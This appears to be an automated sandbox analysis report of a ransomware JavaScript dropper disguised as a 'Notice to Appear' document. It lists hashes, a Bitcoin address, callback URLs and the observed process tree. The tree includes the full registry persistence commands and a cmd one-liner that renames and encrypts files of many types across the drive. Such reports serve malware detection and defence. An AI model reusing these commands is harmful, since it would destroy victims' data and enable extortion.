Analysis
-
max time kernel
141s -
max time network
140s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
15-01-2021 15:50
Static task
static1
Behavioral task
behavioral1
Sample
Notice_to_Appear_00614075.doc.js
Resource
win7v20201028
Behavioral task
behavioral2
Sample
Notice_to_Appear_00614075.doc.js
Resource
win10v20201028
General
-
Target
Notice_to_Appear_00614075.doc.js
-
Size
37KB
-
MD5
f84c5242741ccd7949762ca5cbb96556
-
SHA1
894c726e0a3e8cf3fd98690c27f885c4aa775775
-
SHA256
aa5b2a6a2711cde023d91112c0574f121b4edd6c8b62409155e75d36f38b0bb6
-
SHA512
5f5716fdf73bd38f28e36cf2d8dc5a8b8ec613a3665e43e5103206fb1bc9f32ad8a44c40cea9cf037f609ad33579569b86c8fd2002832d1daf63218e27feab71
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\a.txt
16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB
http://sswboiler.com/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB
http://bucataria-sylviei.ro/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB
http://lifan-m.ru/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB
http://www.czarnieckiliny.pl/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB
http://demo3.twt.it/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
wscript.exeflow pid process 8 1676 wscript.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\Run\Crypted = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a.txt" reg.exe -
Modifies registry class 7 IoCs
Processes:
reg.exereg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open\command\ = "notepad.exe \"C:\\Users\\Admin\\AppData\\Local\\Temp\\a.txt\"" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.crypted reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.crypted\ = "Crypted" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open reg.exe -
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
wscript.execmd.execmd.execmd.exedescription pid process target process PID 1676 wrote to memory of 1500 1676 wscript.exe cmd.exe PID 1676 wrote to memory of 1500 1676 wscript.exe cmd.exe PID 1676 wrote to memory of 1500 1676 wscript.exe cmd.exe PID 1676 wrote to memory of 916 1676 wscript.exe cmd.exe PID 1676 wrote to memory of 916 1676 wscript.exe cmd.exe PID 1676 wrote to memory of 916 1676 wscript.exe cmd.exe PID 1676 wrote to memory of 760 1676 wscript.exe cmd.exe PID 1676 wrote to memory of 760 1676 wscript.exe cmd.exe PID 1676 wrote to memory of 760 1676 wscript.exe cmd.exe PID 1676 wrote to memory of 1892 1676 wscript.exe cmd.exe PID 1676 wrote to memory of 1892 1676 wscript.exe cmd.exe PID 1676 wrote to memory of 1892 1676 wscript.exe cmd.exe PID 1676 wrote to memory of 1092 1676 wscript.exe cmd.exe PID 1676 wrote to memory of 1092 1676 wscript.exe cmd.exe PID 1676 wrote to memory of 1092 1676 wscript.exe cmd.exe PID 1676 wrote to memory of 292 1676 wscript.exe cmd.exe PID 1676 wrote to memory of 292 1676 wscript.exe cmd.exe PID 1676 wrote to memory of 292 1676 wscript.exe cmd.exe PID 1500 wrote to memory of 692 1500 cmd.exe reg.exe PID 1500 wrote to memory of 692 1500 cmd.exe reg.exe PID 1500 wrote to memory of 692 1500 cmd.exe reg.exe PID 916 wrote to memory of 1756 916 cmd.exe reg.exe PID 916 wrote to memory of 1756 916 cmd.exe reg.exe PID 916 wrote to memory of 1756 916 cmd.exe reg.exe PID 760 wrote to memory of 1176 760 cmd.exe reg.exe PID 760 wrote to memory of 1176 760 cmd.exe reg.exe PID 760 wrote to memory of 1176 760 cmd.exe reg.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Notice_to_Appear_00614075.doc.js1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"3⤵
- Adds Run key to start application
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"3⤵
- Modifies registry class
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""3⤵
- Modifies registry class
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\AppData\Roaming\Desktop\DECRYPT.txt"2⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\Desktop\DECRYPT.txt"2⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c for /r "C:\" %i in (*.zip *.rar *.r00 *.r01 *.r02 *.r03 *.7z *.tar *.gz *.gzip *.arc *.arj *.bz *.bz2 *.bza *.bzip *.bzip2 *.ice *.xls *.xlsx *.doc *.docx *.pdf *.djvu *.fb2 *.rtf *.ppt *.pptx *.pps *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.class *.py *.pl *.h *.vb *.vcproj *.vbproj *.java *.bak *.backup *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.sql *.psd *.eps *.cdr *.cpt *.indd *.dwg *.ai *.svg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.jpeg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.mov *.3gp *.flv *.mkv *.vob *.rm *.mp3 *.wav *.asf *.wma *.m3u *.midi *.ogg *.mid *.vdi *.vmdk *.vhd *.dsk *.img *.iso) do (REN "%i" "%~nxi.crypted" & call C:\Users\Admin\AppData\Local\Temp\a0.exe "%i.crypted" mxc36lc5c34xiz6wgbdwc880si5ev536hr1l)2⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\a.txtMD5
31ff92435ec51fab9b7ba2ed4c15dd3e
SHA1696a564dde590c05ad07c16357304fe1c9b25710
SHA256b5aec39215b6000a55dca8f51e96338deb950d5d29796eae1683acb6740cb143
SHA5127066800f4473fe6937ea28e8885aded0db866a5c2c9eb1a8bb4473ea4b069cb54bd87b48f060b32cdaac884f42c0e32360999386426ba0e8752c53dbf8da39f6
-
memory/292-8-0x0000000000000000-mapping.dmp
-
memory/692-9-0x0000000000000000-mapping.dmp
-
memory/760-5-0x0000000000000000-mapping.dmp
-
memory/916-4-0x0000000000000000-mapping.dmp
-
memory/1092-7-0x0000000000000000-mapping.dmp
-
memory/1176-11-0x0000000000000000-mapping.dmp
-
memory/1292-2-0x000007FEF7080000-0x000007FEF72FA000-memory.dmpFilesize
2.5MB
-
memory/1500-3-0x0000000000000000-mapping.dmp
-
memory/1756-10-0x0000000000000000-mapping.dmp
-
memory/1892-6-0x0000000000000000-mapping.dmp